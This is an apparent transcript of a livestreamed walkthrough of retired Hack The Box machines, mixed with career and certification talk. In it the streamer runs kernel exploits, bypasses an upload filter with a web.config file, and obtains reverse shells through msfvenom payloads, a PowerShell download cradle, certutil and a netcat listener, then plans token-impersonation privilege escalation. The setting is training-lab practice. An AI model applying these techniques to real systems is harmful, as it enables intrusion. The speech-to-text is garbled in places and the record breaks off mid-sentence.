gotta supply the ID RSA. There we go. Get our password here, log back in this box. Job market create. Oh, that was the same message earlier. There's also a bug bounty on the side while working blue team gig. That's true. Alright, let's do you know anyone who is in cybersecurity that's also good with redoing or looking at resumes? I mean, not really. I mean, I can look at it for you if you want. If you want to send it to me on LinkedIn, I'll take a look at it and let you know what I think. We gotta run limpies again. I think I still got my limpies output actually here. Yeah, we don't have to run limpies again. That sudo exploit didn't work, guys. You know what we could do though is we can try compiling this exploit. What if we do GCC? No, we gotta do nano. Oh, nano exploit .c. Paste the code, and we will GCC exploit .c-o exploit incompatible. Okay, well that didn't work on my machine either, so that makes sense. Well, let's try to grab a different one. Is this a different one? What's this -02 mean? We'll do remove. We'll remove that exploit, and then we would nano exploit.c. Paste this code, and then we will GCC. It's telling me to do GCC -02. Alright, so exploit.c -02 -o exploit. Unrecognized option? Why does everyone tell me to do -02? Is it O2? O2 worked? Oh, there's an exploit there. Does O2 make it automatically executable or something? Because it's already executable. We're still hype. Aborted core dump. Target failed. Well, that didn't work. Let's go to my linps output again. I can't on the machine. GCC version, that's nice. We found out the GCC was already on it, but I didn't realize it set it up there. Well, we can try Dirty Cow. I know Dirty Cow works. Well, let's try Dirty Cow exploit. Remove, exploit, everything, and then we will nano dirtycow.c, paste this, y enter, and then we can do chmod +x dirtycow.c, and we will run dirtycow.c. Original exploit dirty, what? Unexpected token. / is a directory. What the heck? Well, that didn't work. TMUX 1000? What? Sure. What does that mean? Oh, that is... All right. Dirty cow didn't work, guys. Dirty cow 2? Let's try a different dirty cow exploit and see if we get any kind of different results. There was a TMUX session, yeah. We can try that here. I was trying to see if we can get these one of these easy CVEs or something. My chair is stuck. I cannot roll it around right now. Okay, let's try this. Let's try this other dirty cow exploit. We will do nano dirty cow dot c, and we will do gcc dirty cow dash o dirty cow o. That doesn't look good. All right, well. This looks like it might work. I don't know. It says shellcode at something. I can't type. I don't know. I might have broke the machine. I gotta broke the machine. Kernel exploits are pretty dangerous to run. Yeah, there is a TMUX session right here, it looks like. Wonder if we can attach myself to that somehow. It's in /dot. I broke the machine, dude. I think I broke it, guys. Unless ping's not on. Let's I crashed it. It's broken. Let's revert. Don't do kernel exploits on real world engagements, guys. This is why it'll break stuff. But on CTF, fair game, man. Just revert that machine and try again. Thanks, Firedog Sec. What's my greatest challenge in day-to-day work with ethical hacking and pen testing? I would say the biggest challenge is not knowing if you try hard enough. You know what I mean? Because here's the thing, like with a CTF, it's like there's vulnerability. You know what I mean? Like I know there's something here to help that will get me from user to root. I know that for a fact, just because that's the way a CTF is designed. They're intentionally vulnerable. However, in real-world pen test, they're not intentionally vulnerable. So you don't know if there's an exploit there or not. You don't know if there's vulnerabilities there or not. You know what I mean? And then you can spend all day searching on a machine or in a network, basically. And that's another part that makes it hard is these networks are massive. Like you can be on an internal network penetration test that has 200 machines, and it's overwhelming because there's so much to look at, and there's not enough time to look at everything. It's just simply not. And the hardest part is wondering if you searched hard enough, wondering if you tried hard enough. I mean, you do get an entire week, maybe 2 or 3, depends on the engagement, but typically it's a week for me for an engagement. And you spend all week looking for something and you get maybe a few findings and you're like, wow, did I suck, or is this client actually secure? And you don't know. And that's the hardest part for me, because I'm not the greatest hacker in the world. As much as I would like that to be the case, it's not the case at all. Far from it. So I could very easily miss stuff, and you can see me do these CTFs. Even these easy machines give me a little bit of a challenge, right? So it's definitely hard. That's the hardest part for me. But the rest of it, man, I love it. And not saying I don't love pen testing, but dealing with the clients and getting on calls and talk to them about their findings and stuff, that's cool. You know what I mean? Because you're helping real businesses out there. You know what I mean? I get on a call, I'll be like, hey, I found cross-site scripting on your web app. Here's where I found it. This is why it's a big deal. Fix it. And they're like, wow, we had no idea we had cross-site scripting in our web app. And I find cross-site scripting in web apps quite often, believe it or not. Would you say pen testing / ethical hacking, you do 90% reports and 10% actual hacking? And how much time do you have doing a typical pen test on average? Like I said, my engagements are a week, sometimes 2, sometimes 3. It really depends on the engagement. And sometimes it gets split up. Sometimes I'll do like a 1 week web app, 1 week external pen test. No, it's not 90% reporting. I would say Most of my time is spent researching, because like I'll run a scan and I'll see something that I don't never seen before, and then I'll research that. And then, but you spend a lot of time enumerating and doing recon, that's most of the time that where it's spent. I don't spend that much time reporting, and the reason why I don't spend much time reporting is because my company has a report team. We have a professional writing team, so I just have to write what I find, and then the reporting team does the rest. I don't have to write all the nonsense. The only thing I have to write about is the findings and the vulnerabilities. I don't have to write like the executive summary and stuff. Well, I do have to write a pentesting narrative, but I don't have to write like I don't have to make like the cover page and stuff. I don't have to make the table of contents and the stuff that doesn't really matter. You know what I mean? Like I write the real findings. What's up, riders? We're gonna stream. Thanks for stopping in. Glad to see you here. I usually spend a day writing my report, and actually, it's not even really a day, because I report the findings. I write them in my report as I find them. So by the end of the week, like the report, I just have to like kind of write up a final executive summary, and then I'm done. This machine's done, so we can do nano. How old am I? Sorry, I said hi, riders, and you've been here for a minute. My mind is toast. How old am I? Should I answer that question? I don't know if I want to answer that question. If we get one other person to say answer the question, I'll answer the question. Doing OSCP, how much time do you need to study and had you find the overall exam as hard as they make it look, or relatively straightforward? For OSCP, it was extremely challenging. I would say, imagine doing like 6 easy hack the box machines in a single day. That's basically what OSCP is, in my opinion. And then you have to spend a day writing it all up. But oh, what did I just do? I didn't mean to do that. Nano Etsy hosts. But it is as hard as they say. Yeah, it really is. I mean, like this machine right here is very similar to like what you would see on OSCP. You know what I mean? Like this right here is pretty good practice for OSCP. These older hack the box machines. I don't think the newer hack the box machines they're actually harder than OSCP, in my opinion, the newer ones. But these older ones here are very OSCP like. So what you're seeing here is very similar to OSCP. But the only difference here is like we're only doing one machine here. OSCP, you're doing 6. What's up, AK? We're on the stream. Thanks for stopping in. How you doing today? What's up, Can? Hack Self? We're on the stream. Thanks for stopping in. So would you say you usually do a write-up report in a day? Yeah, I mean that's pretty fair to say. You're gonna guess on 26? It's a decent guess. You know, I might have answered this question on a stream before. So if you watch every single second of all my streams, you might get the age. That's a lot of time. That's like 20 something hours. That maybe 40 hours worth of content. That would take a long time. What's the passphrase for my key here? It's this. Okay, well, we broke. Can I like attach to tmux? I forgot how to use tmux. All right, so if we do, let's put this in my notes real quick. Is this the name of the session? Tmux dash. They were root, dude. That was it. It wasn't tmux. What are we thinking, dude? Why did we take so long to do this? Why didn't we just try that first? Why? I always make everything harder than it needs to be, dude. This is why OSCP was hard for me, okay? Gosh. I'm like, that's too easy. That's not it. And it was. Oh, we're root. Look at this. Who am I? Root. The root session on tmux, dude. All we had to do was attach to the session. What are your license, passport, and phone details? Let me get it out of my notebook here. Yeah, no. What's up, Cypher? Things happening. Glad to see you here. Alright, well, that took way longer than it should have. But hey, we won. We pwned it without any help. Look at that. We pwned it with no... we didn't use guided mode. Got a couple of tips from WireDogSec there for the SSH key. The root flag was honestly a piece of cake, dude. At least I pwned it. That's all that matters, dude. If it takes a second, it takes a second. Semi hot or cold on the age? I don't know, man. You're in. I would say you're in a decent range. I would say you're hot. I mean, you would be cold if you guessed like 90 years old, or if you guessed like, 12 years old. That would be cold, but 26, I would say you're hot. You're warm. Or it might be 26. That might actually be the age, and I just won't tell you. How much time we got left? We have 1 hour left to pwn another machine. Let's go ahead and get it done. Let's do another machine. And if it goes over 4 hours, then it goes over 4 hours. But Did he say 6 years in the military? I did say I spent 6 years in the military. That is a factual statement. Alright, so the next machine is Sunday. Dang, we should save this for tomorrow's stream. Should we? Not tomorrow's stream, Sunday's stream. We do Sunday's streams as well. Guys, should we save this for Sunday's stream? I mean, you can't pwn Sunday on a Thursday, right? That just seems illegal. So let's skip this one and we'll do this one on Sunday. We gotta save it. Let's do bounty. You pwn Sunday on a Thursday and you get arrested? Hey, stop right there. Stop right there, criminal scum. Figuring out how to transition from being a cybersecurity specialist / generalist into a pen testing, thinking of starting with PJPT, PNPT, CPTS, OSCP. That's a good path. That's a really good path, actually. You could probably eliminate either PNPT or CPTS and just instead of getting 4 of those, just get 3 of those. Do PJPT and then either choose PNPT or CPTS and then OSCP. You could probably, instead of doing 4, just do 3 of those. But PJPT is a good starting point, and then OSCP is a good endpoint. And CPTS is actually harder than OSCP, so it might even make more sense to do PJPT, OSCP, and then CPTS. Because CPTS, from what I understand from other people, it's harder than OSCP. And plus, as WireDogSec said, OSCP remains a gold standard for pen testing jobs. It makes sense to get that as soon as you possibly can. And that's going to get you interviews. And then CPTS is going to help you boost your skills, in my opinion. I don't have CPTS, so I never took the exam. I've done some of the hack the box modules. My route was I went EJPT straight to OSCP. You can make that jump. So if you did PJPT, you could go straight to OSCP after that, in my opinion. And I got OSCP relatively quickly. I got it in like 80 something days. So, but that was a lot of work though. Like I would do 3 to 5 hours every day during the week, and then I would do 10 to 12 hours on the weekends. And it was day after day after day with very little break, like almost no days off for like 80 something days straight. And that's how I passed OCP on my first try. What's up, Gage? We're gonna stream. Thanks for stopping in. You actually had a pen test job interview a couple weeks ago? Nice. Yeah, networking with others helped a lot too, for sure. That's how I got my current job, actually. What I did was I was doing Hack the Box every single week, like what we're doing now. This is before I was streaming them though. And I would just post on LinkedIn, like, hey, I hacked the Hack the Box machine. And then I would do that every single week, and people, they took notice of that. And when I put up my open to work banner on LinkedIn, I had someone reach out to me. I'm like, hey, my company isn't hiring right now, but I can throw in a good word for you. Turns out they were hiring, and then I got hired. All right, let's do our Rust scan here. Port 80's open. It's Bounty. It's a blue wizard. It's a blue wizard. Alright, well, let's do this. Let's put this in our SE host file, and we'll do... So now if we do BOUNTY, we gotta do... And I guess we don't have to do this, but makes sense to do bounty.hack the box. Alright, there we go. Works. Alright, let's do Buster. Let's start with our big word list this time. Probably going to get us better results right off the rip. So we will paste this. How do you manage the plausated boxes? I don't know what that means. Plausated? What's that mean? Merlin.jpg. That's probably this guy, huh? The page source. Is this Merlin JPG? Yeah. Not seeing anything interesting in the source here. Is this a retired machine? Yeah, everything I stream is retired machine because you're not allowed to stream active machines. So you can actually get banned off Hack the Box if you stream or do a write-up for a active machine. So never do that. Also, was it Zing? I'm just gonna call you Zing if that's right. If not, correct me. But welcome to the stream. Thanks for stopping in. Glad to see you here. What's up, Steve Campbell? Welcome to the stream. How you doing today? I like to run a quick word list first, like the default dir search or sec list. Boom, then run a large word list after that. I think it goes straight for the large word list, to be honest with you. It's uploaded files. Let's check that out. Well, I think it's uploaded files without a space. 4 or 3 forbidden. Yeah, I'm forbidden on that one. See our Rust scan results here. Still only port 80, so let's run Rust scan one more time. And 128, is that the IP address? Yeah. This picture right here of this guy and the picture on the front, like, that, it doesn't even seem like it's the same box to me. Like, it just seems like it's, like, when I see Bounty, like, I don't think of this. Just like WireDogs just said, if you just join, hit the subscribe button if you're enjoying the content. Like the stream if you haven't already. I stream every Sunday and Thursday. And I also make YouTube videos. I got one dropping tomorrow called Cybersecurity Myths. What's it called? Jaw-dropping Cybersecurity Myths Debunked. And it's a juicy one. Let me tell you what. There's some hot takes in there. Sorry, I lost your chat window. Well, I said welcome to the stream, Steve. Thanks for stopping in. Glad to have you back in here. Merlin might be the name of a user, actually, if you think about it. If we can figure out how to take advantage of like a username. Still nothing in our Buster. 480 looks like it's the only thing open, which makes this a lot easier. Robots.txt. Nothing. See if there's like LFI while we're waiting here and just, why not, you know? Nothing. Why do I not seem to get points on Hack the Box? I don't understand the system. That's a good question. I can explain it to you real quick. So, if you go to machines, you only get points if you do the active machines. So we can go to both here. So you only get points for doing active machines. Retired machines do not give you points. Okay? And then when you pwn a box, like for example, I pwn PermX here as an active machine. When this retires, I lose points. So you only get points for active machines and challenges, by the way. And as soon as it retires, you lose points. So I haven't been doing a whole lot of active machines lately because I've been streaming retired machines. So my score has been going down a lot because retired machines give you 0 score. Hopefully that makes sense. But however, so I used to have every active machine pwned and my bar was like up to here or something like that. But since I've been losing points, it went back to 0%. I can never lose the pro hacker rank. No matter how many points I lose, I can stop playing forever. I'll always be a pro hacker. So you can never get down. You can never lose your progress on a level. So I'll be pro hacker for pretty much ever until I do something to get to elite hacker. Which in order to get to elite hacker, you have to have every single active machine pwn, which I've had that. Not enough. You have to do every active machine plus some challenges. So it's extremely hard to get on elite hacker. Hopefully that helps. Hopefully that clarifies it. Yeah, I scanned all the TCP ports. We got port 80 open. So what we're going to do is we're just going to do a comprehensive scan with Nmap here on port 80 and see if we can get anything interesting. It's aggravating to keep losing points because you didn't have enough time to keep your streak. Yeah, I mean that's the game. It rewards consistency. It doesn't reward gradual. Yeah, it rewards consistency. It's the best way to put it. Like if you get on it every day. Well, it's not even every day. Like if you just pwn a Hack the Box and active machine every week because they come out once a week, that's the game. Is you just pwn one every week. I personally stopped playing that game because I found out like most employers don't really care about your rank, right? So I stopped doing the active machines. If I could stream the active machines, I would definitely stream them, but I can't stream them. I would rather stream content for you guys. Because I think that adds more value to the community overall, rather than me just pwning machines off stream when I can sit here and talk and explain what I do. I think it's a lot more value to have. So that's why my rank's been going down. I wouldn't get caught up on your rank, to be honest with you. Most employers don't care unless you're like super competitive, but the seasonal points, the seasonal rewards, in my opinion, aren't that good. I mean, they give you like I've gotten merch, money for the merch store like 4 or 5 times now. But the problem with it is like they don't give you enough money to actually buy anything with it, and then it expires before the next season. So, like by the next time I get another gift card, my previous season's gift card expired. So I've actually never taken advantage of any of the seasonal rewards I got, and I got to the highest platinum rank every single time. No, sorry, was it diamond? No, it's hollow. Hollow is the highest rank. I've gotten hollow on every season except for 2. I got platinum on 2. No, I did do it. I did scan all of them. Look. So Rust scan is -R is the range, 1 through 65,000, 65,535. I scanned all of them. Oh, I did the wrong IP address here, unfortunately, for my map scan. Let's try this again. Let's try a different word list here for our exploser fuzzing. Yeah, RustScan's super fast. Don't use it on a real engagement. Only do it on CTFs. It's kind of like mass scan. You don't want to run mass scan on a real world pen test. But for CTFs, it's really good. RustScan is. It's way faster than IMAP. It uses IMAP in the background, but it takes IMAP and puts steroids in it basically. This one found Merlin. Look at that. IIS start. So that's interesting. Is that really what it is? Transfer.as. Oh. Transfer.aspx. That is really interesting. Ooh, we can upload stuff here. That's what I like to see. That's what I like to see. Let's upload this image from this last box. Upload. File uploaded successfully. What if we do /omg? What is the name of the file? Was it a JPEG or J? Yeah, J. Sometimes I don't know if it's a JPEG or a JPG. It's the same file format, but there's two different abbreviations you can do. It's the same thing though. So omg.jpeg. No. We can upload files here, guys. This is a game changer. We just gotta figure out where this gets uploaded to though. Once we figure that out, see uploaded files. I mean that makes sense, but we got an error when we went here. What if we did this? Upload a file slash omg.jpeg. That might work. No. Oh, I would bounty. Yeah, that ain't gonna work. Let's delete that part of it. There we go. Bounty.htb upload a file slash omg.jpeg. Let's change files to directories. See what we got on this one. The fact that we can upload files is a huge deal. I guarantee we gotta upload something malicious here and get a reverse shell, but we gotta figure out how to trigger it. We gotta figure out where it's stored at. Uploaded files makes sense, but it says we got permission errors. Let's look here. Oh, we're getting more stuff here. Ooh, look at that. We're getting... Let's copy this. See what's on this. Well, let's duplicate. Forbidden. Yeah, I mean we'll run mass scan on a big network with a short time span, but we avoid it wherever possible. I was listening to a Dark Tent Diaries episode the other day. I think it was episode 80 or maybe 81, where they ran a mass scan and it shut down the whole network. I'm like, yikes. Client fired them. It has something to do with this upload, guys. But we're running out of time. I don't know if I want to use guided mode to speed this up. I feel like I can figure it out with enough time, but I'm afraid that will... screw it. If the stream goes over 4 hours, the stream goes over 4 hours. Yeah, I'm thinking burp too. So we can see where... Let's just close out of this. That was from the last box. This was also from the last box. Drop. Drop, drop. Open browser. I need to drink more Mountain Dew, guys. I feel like... What's your guys' beverage of choice when you're hacking? Mine was coffee for the longest time, dude. But then they came out with sugar-free soda, and then I found out that they did sugar-free Baja Blast Mountain Dew, dude. And this changed my life. And I do I just recently moved in my new home here. Like, they have zero sugar Spark Mountain Dew. They had zero sugar Major Melon Mountain Dew, and they got Baja Blast. I only drink sugar free. So if they don't have sugar free Mountain Dew, then I'm kind of SOL. But what just happened? I don't want this. I don't want that intercepted. But yeah, I really do like sugar free soda, like Pepsi too. But Mountain Dew is probably my favorite because Mountain Dew has the most caffeine out of any soda that I've found. I do like my coffee because I'll drink straight black coffee because I don't like sugar, and I'll put creamer in it either. And but it dehydrates me. You know what I mean? I feel like with Mountain Dew, like I feel like the bulk of it's. I feel like it doesn't dehydrate me as much as coffee does. Too much sugar / carbs gives me brain fog. It makes me crash. Yeah. No, yeah, sugar makes me crash too. For sure. That's why I avoid it. I feel sick. That's why I like these the zero. They're not only zero sugar, they're 0 calories too. So it's like I don't feel guilty for like drinking like 4 of them in a row. 0 calories and 0 sugar. It's like I feel like I'm drinking water. Like I'm not, you know what I mean? It's like almost like water. It keeps me decently hydrated too. I mean, it can't replace water, but it's a decent substitute, I guess. All right, we need to go here in my burp proxy. Let's intercept this request. So this is the file. This is all the information of the file that we're trying to upload right now. BTN upload. We gotta figure out where these get uploaded to. On the weekends, craft beer while you're hacking? Heck yeah. I can't drink beer when I'm hacking because I'll fall asleep. Beer makes me sleepy. I do like drinking beer occasionally, but I have dramatically slowed down my alcohol consumption because it just makes me tired and I'm really not that productive. I can't think really well. But you can't fall asleep if you drink nothing but caffeine. I should not be drinking caffeine right now. It's 9:30 at night for me. I should have stopped drinking caffeine like a half hour ago, but I want to get through this box. You quit drinking alcohol? Good for you. Good for you. I'm almost all the way quit. I mean, I'll indulge once every few months. You know what I mean? And right now, I think right now I'm just like a social drinker. Like if I live by myself, I haven't drank for a long time now. But if I'm, a social setting and someone offers me a drink, I'll probably consume it, assuming that I'm not working the rest of the day. Like if I'm just trying to chilling somewhere. We gotta figure out. We gotta figure out how to take advantage of this file upload. System web. We already went there. Uploaded files. Man, that's gotta be it though. You know what I mean? I wanted to go here. It says forbidden access. You have permission to view this directory or page using the credentials that you supplied. Let's see what we got here. Remote code execution in HTTP is vulnerable. The remote code execution vulnerability exists in HTTP protocol stack that is caused when HTTPS probably. Well, this might be the way in. This could be it. I'm gonna close out a burp. Had to quit completely. I think that's why I quit drinking coffee actually, because I was getting a lot of headaches too. I don't drink a whole lot of coffee anymore. I think a cup of coffee has more caffeine than Mountain Dew. I could be wrong on that, but I feel like it does. No, I didn't figure out where it was stored. Well, I'm pretty sure it's storing it in uploaded files. I just don't have permission to access this, so I don't know. I didn't fuzz for file extensions. This is a DOS. I don't want that. Did you add your image name to the end of that directory? Yeah, I did. I did, what was it? omg.jpg. see. Let's try something else here real quick. omg.jpg. We'll try this one more time. Oh, that worked that time. Oh, perfect. What kind of box is this? It's a Windows box. So, alright, let's see if we can try this. Let's see if we can try to do like a, is it run a PHP, ASPX? No, let's do transfer.aspx. Let's make an ASPX file, dude. Easy. I think that's gonna be the way in, guys. Let's do MSF Venom. Let's do a interpreter shell. Windows x64 interpreter reverse TCP lhost. That is my IP address 16.30. Okay, we'll do format ASPX output pom.aspx. Let's try that. See if that works. Now we will copy. No, we'll just move pon.aspx to home Kali downloads. And let's do choose file. Why is it not in my downloads file? That's really strange. Cat. Well, what? Oh, I know what I did wrong. It's gotta be a capital D, dude. I think we might have made a directory. We'll move this to /home/Kali/ that probably worked. Yep. What did I just do? Where's downloads and downloads? Oh my gosh, I see what I've done. Download /pwn.asp. You know what? It's just gonna be easier if I just do it this way. Remove home/Kali/downloads. Alright, and now we're going to run MSF Venom again because I messed it up. We'll do output is /home/Kali/downloads with a capital D /pwn.aspx. That should fix the problem. So there it is, pwn.aspx. Open, upload. Let's do MSF console-q, and we are going to run. We're going to use interpreter here because why not? What was in the image? It looked familiar. Someone said that earlier in this stream. I don't know, man. Nothing was in the image. We looked inside of it. I mean, it was not very hard, but we checked. We did what's the tool? Xfill, whatever the tool is. Use multi-handler. Use multi-handler. We got to spell that right. And we will do set payload Windows. Oh, I don't know. It was like a lady with a heart or something. Windows x64 interpreter reverse TCP, and we will set L port to 443. Set our L host. No. Set L host to 10.10.16.30, and we will run. Alright, it's working. Invalid file. Choose file. I can't upload pwn.aspx. No. Well, let's try this. Let's open up burp. And we will drop this. Drop all of that. Open up the browser. What's up, shooter? He said, what's up, dog? I ate like 12 Adderall. Let's rob some banks. Bro, don't rob banks and don't take 12 Adderall. That sounds dangerous. It's bad for your health. Yeah, I'm opening up burp right now. We're gonna change the file extension in this. And we're going to see if we can get past the filter here. The extension filter. Alright, forward that. Choose file. pwn.aspx, select, and upload. Alrighty. What if we just put JPEG right here? And well, let's send this to repeater so we can try this a bunch of times. Send. Status 200 okay. Let's see what happens here. And where's my upload of files? So it was pwn.jpg. Did it work? Hey, no, never mind. I thought I got it. I was so excited. And that was false alarm. No, that's what I would have said if we got a shell. Okay, what we need to do now is let's go back to burp. And instead of doing pwn.jpg, let's do pwn.jpg.aspx and send that. Invalid file, please try again. Let's try this. File uploaded successfully. Leave the extension but change the MIME type. How do we change that? Is it the content type? This is a shellcode. What do I change the content type to? Octet string. I don't know what it changes to though. I mean, that makes sense to change the content type. I just don't. Well, let's look it up. How to bypass files. Man. Here we go. Here's hat tricks. You like how DuckDuckGo didn't give me hat tricks, but Google did? I hate DuckDuckGo. I gotta fix my browser. So, is it Maddie? Maddie? Welcome to the stream. Thanks for stopping in. Glad to see you here. Hmm. Change the content type to image / JPEG. But keep the file extension as a JPEG, or should I keep the file extension as ASPX? See if that works. Invalid file. JPEG. That worked, but ASPX doesn't work. See, invalid file. What if we did .jpeg .aspx? Invalid file. There are other extensions that might work with ISS, you're right. Let's try ASP. I think that's one of them. That works. Invalid file. Can we do an exe? It's only checking the file extension. So if I change this to PNG, I bet you that'll work. File uploaded successfully. ASP. That's what it was. Invalid file for ASP. I'm gonna figure out, it's just checking the file extension here. So what if we did all caps ASPX? Invalid file. Go back over to hack tricks here and see if we can get an idea here. We can try PHP maybe, but I don't think it runs PHP. Invalid file. What if we did ASPX%20? Invalid file. Invalid file. That's not good. What if we did, let me think here. This has got to be the way. We just got to figure out how to bypass this file extension. Once we do this, we'll be off to the races. What other file types can we use with MS Venom? Here we go. ASPX EXE DLL. That's something we can try. Maybe they didn't filter all of them. Invalid file. Access to. That's not what I wanted to do. Let's try and burp. Okay. Let's try access to, see if that works. There's got to be a file extension here that works. Keep clicking the wrong thing. How do I keep doing that? DLL, ELF, I don't think ELF's gonna work. HTA dash PSH, that might be it. Invalid file type. You should be able to use intruder to fuzz the file extension. Yeah, you're probably right. How would I? AshX AMS AM. Alright, let's try that. AshX. Invalid. ASMX. Invalid. Well, I'll be darned. Well, let's look up, let's try the intruder thing here. Alright, we'll go to payloads. We need to load or list. Is it wfuzz? Where's... Yeah, let's go back. Sec list. Fuzzing. There's file extension somewhere. Extension test.txt. Is that what I'm looking for? Extensions boom. Let's try extensions boom. There's a bunch of extensions here. These all start with a percent though. Is that what we want? Extensions most common. Fuzz.txt. Oh, here we go. This is what we want. Well, hold on. Yeah, let's just do that. Add a new item. Can I do... Well, hold on. Positions. Dot. Yeah, we don't want to include a dot. Alright. Yeah, okay. Well, if we do a PNG, let's add that. We know that works. We know JPEG works. Let's try this again. I want to see what the results is as far as the length goes for PNG and JPEG. There should be a different length, I'd imagine. No. Conf got a different one though. Why does PNG? I'm gonna look at the response. File uploaded successfully. Oh no, it's 11331. Oh, okay. 1331 is accepted. So we got doc, docx, xls, and that's it. Can we exploit any of that? I mean, we can do one with macros, maybe? You think that's it, guys? Uploading a doc with macros? That seems too advanced for an easy box, because macros is kind of hard to set up, to be honest with you. And you need someone to download it and open it. I don't think they have simulated users on this, you know what I mean? I don't think the macro config was, I did see that, wasn't it different? There's conf. Conf is getting the same thing. Config worked. File upload successfully for config. How do we take advantage of that though? Can I just navigate to it now? And it just runs it as ASPX? Pwn.config. That worked. But when I try to navigate to it, I get nothing. As you can see here. Huh. Good night, Tech with Cody. Thanks for stopping in. Thanks for hanging out. Have a good night. Sleep well. Google search executable code and config. Well, let's just go to Google. That or Google ISS version upload vulns. Yeah. I don't know. Setting ISS to execute exe instead of downloading. Configuring IIS to run executables on web server. EXE didn't work, right? We tried EXE, right? I thought we did. Let's just try it again. Invalid file. So config works. But my thing is why is this uploaded files pwn.jpg? See? Let's upload a file. Own JPEG. Open. Upload. So if I do own.jpg, it should load. See, what the heck? Why is it not working? Nah, it worked earlier. This box seems a little unstable to me. Own.jpg. Oh, it's OMG. What am I doing? That's why. OMG. There we go. I don't understand this. Why does it not work? I just uploaded it. Like, look, I have pwn JPEG, send, file uploaded successfully. But then when I go to pwn.jpg, it doesn't load? No, there it goes. What's up, Anon? Welcome to the stream. Thanks for stopping in. Glad to see you here. Web.config files are like HCA access files on Apache. They can tell the server how to handle file types. Config works. It sounds like a possible RC. Yeah, I gotta figure out how to write in a config file though. You know what I mean? GIF89 Rev Show. What's up, Trenton? Thanks for stopping in. Glad to see you here. Oh yeah, the Heartbleed. That was in the last box. I'm just recycling that image that I saved from the last box. We took advantage of Heartbleed last box. Web.config. This might work, guys. This is a reverse shell. Let's just copy this and go. Let's go at it here. Why can't I? What the heck? Why does it not let me go into the directory if I put a slash in front of that? It drives me nuts. Alright, so let's... Oh, we need... It says download string invoke PowerShell TCP 1. Oh man, we gotta... I gotta make a PowerShell TCP PS1. This shouldn't sound too bad, actually. I don't think. Right? All I have to do is upload this file, but then put invoke PowerShell TCP PS1 on my web server. That should work. Well, let's try it out. Let's just do a quick test, and if it calls for that on our web server, then we can go from there. So, but we can just do a quick test. Hold on. We want to copy web.config to home Kali downloads, and then we want to do a Python. We might not even need Burp Suite for this, guys. We might be able to just hit choose file and then upload web config and then upload. Yeah, it's successful. So we should be able to just do web.config. It looks like it worked. Look at that, it worked. It made a call for invoke PowerShell TCP PS1, but I got 404 because I don't got it in this directory. So all I gotta do is put invoke PowerShell TCP PS1 on this. So I think let's just download a fresh one. That worked. We got a ref shell here, guys. So we just need to grab this. Just grab this file here. Search that. Alright, so this is invoke PowerShell. So we will copy this. And then we will nano. Oh, not ano. Nano. Oh, we gotta get the name of the file. Right here. And then we gotta get the file contents, and then we got to set up a reverse shell. We gotta set up a listener in here, but wait a minute. I thought this had it to where all you had to do was change the IP address and port. Or somewhere. Am I missing something? Either build PS1 or use ref shell for simple shells? Yeah, you're right. That's exactly what I was thinking. We're gonna keep the same name. We're gonna keep the same name even though we're not actually using the invoke PowerShell TCP. We're just going to keep it that because that's what we put in our. We just gotta change 2930. Change that. Alright, and let's do Let's do a regular show. We're not gonna do an interpreter show here. netcat-lmvp443. So we should be able to just refresh this and oh, it deleted my thing, I think. Let's try that again. Web.config, open, upload, and then refresh this. Did it work? It worked. Look at that. We're in. That was fun. That was cool. It took a while to find a file extension. We found out the vulnerability really fast, but the file extension took a minute. I didn't think about config, like .config, but once we figured that out, we were golden. We're Bounty Merlin. We have a really bad shell, but how do I stabilize this? Can I stabilize this somehow? To where I can see what direct. I mean, I guess it doesn't matter, but we can do like a change directory. Change directory c:/user/merlin/desktop. Ls does not work on Windows. Oh my god. Well, Ls does work in PowerShell. Do we not have anything in the desktop? There's nothing on the desktop? Administrator Classic Merlin Public. Is there nothing in Merlin? There's nothing, no flags in desktop. Still nothing there. Huh, that's weird how there's no user flag. I guess maybe Classic is a user that we gotta prevest to. Change directory to no, change directory ///. Alright, that's Classic. So if we do change directory Classic, did we go in there successfully? No, we did not. We probably got permission denied. Yeah, we gotta upgrade the shell. Let's do. What's the best way to upgrade this shell? Probably upload another shell. So let's do this. We'll just do an exe here. We gotta close this. And then we got to Python there. Oh. And then we will just grab my notepad here. This is from the last box. Let's go ahead and delete all that. And we're going to do cert-util here. So we're going to do pwn.exe, pwn.exe, and then we are going to do our IP address, which is 10.10.16.30. And we will copy this and we will place it into here. No, let's not do that. let's go change directory /make directory temp, change directory temp, print working directory, we're in temp. All right, good. Now we'll download that. Hopefully that works. So you're gonna see where you at on this box. Well, we got initial access. We don't have the user flag yet, so we're trying to figure out how to get the user flag. I think I gotta privest from the current user to a different user, get the flag, and then go to administrator. So let's do netcat. No. We're gonna do a interpreter shell. And then with the interpreter shell, we're gonna get a lot of options here. I always spell multi-handler incorrectly. I always put an I in front of the T. Let's do set payload Windows. Already run WinPs? No, it's a Windows box, but we'll run WinPs once we get a stable shell here, or once we get the user flag. Maybe we'll see what happens. We'll see what's going on. Once we get a stable shell, we're gonna get a lot better idea what's going on this box. Oh yeah, for sure. When I was going through my OSEP studies, I was using Interpreter every time. Like I haven't taken an exam, but yeah, you want to use Interpreter almost every single time. Matter of fact, I have an auto script to run Interpreter listener with a bunch of other options that I like to add to help be more stealthy and bypass techniques automatically. Like I have an auto script for it. All right, so let's ./phone.exe, and it should give us a reverse shell. Maybe. Everything looks good to me. There we go. Look at that. Alrighty. So we have an interpreter shell now. Nice. Just make sure there's nothing in here again. Desktop. Yeah, nothing in there. Huh. I think we got a classic net app pool. Oh, that's a whole user? Let's go in there and see what that is. Change directory. See if it lets us go in there. Oh, I gotta go back 2 levels. Access is denied. What's a junction? Change directory default. Just PS that thing? What do you mean? I think something along the lines of dir/s find string user.txt from users dir. Oh, you're saying. Oh, I see what you're saying. Well, it's not. It's a hack the box thing. It's gonna be in the user's desktop. I've never had a hack the box string not be on the user's desktop, so I'm not gonna try to search for it. I mean, I could, but I don't think it's worth. I mean, oh, I think that one I use, but let's go to change directory. Root. Let's see if there's anything in here. Go to the upload a file, see if there's anything interesting. Nope. Let's hoping there'd be something cool. There's a CS. No. iNet pub. Change directory. What the heck is Custer? Who am I? We got SE impersonate privilege. That's really good. That's really, really good, actually. We can probably try to use God Potato here. Print spoofer time. Yeah, we can. I like to use God Potato because I think I find more success, but we can try print spoofer after that. We just gotta figure out how to get God Potato on the system, which is alright. Let's close out of this. Change directory into my tools, ls. We gotta figure out what version of .NET framework we're working with here. Paste this. We are running on .2, so what we're gonna do, I'm gonna close out of Ferox Buster. I'm gonna close out of Nmap as well. This is our initial shell. We'll keep that open. Because I think, yeah, it's still working, so we can have that as a backup. Just in case we lose our one we got now. With that privilege, a specific get system flag and interpreter that will work. Probably. I'm 